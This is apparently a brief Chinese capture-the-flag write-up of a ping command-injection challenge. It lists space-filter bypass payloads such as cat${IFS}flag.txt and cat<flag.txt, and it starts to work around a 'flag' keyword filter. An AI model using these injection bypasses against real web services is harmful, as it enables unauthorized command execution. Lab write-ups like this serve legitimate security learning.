ping地址成功了,再看看目录
直接有flag,尝试使用,但是过滤了空格
绕过空格方式
cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
(28条消息) Linux下绕过空格的方式总结_北陌的CSDN博客-CSDN博客_空格绕过
一个个尝试
发现t$IFS$9有用
但是又过滤了flag,那没有办法再绕过了,只能试试index.php
可以传入一个a,看看能否让flag不被过滤
但是还是没看到,源代码里也没看到,再查看开发者工具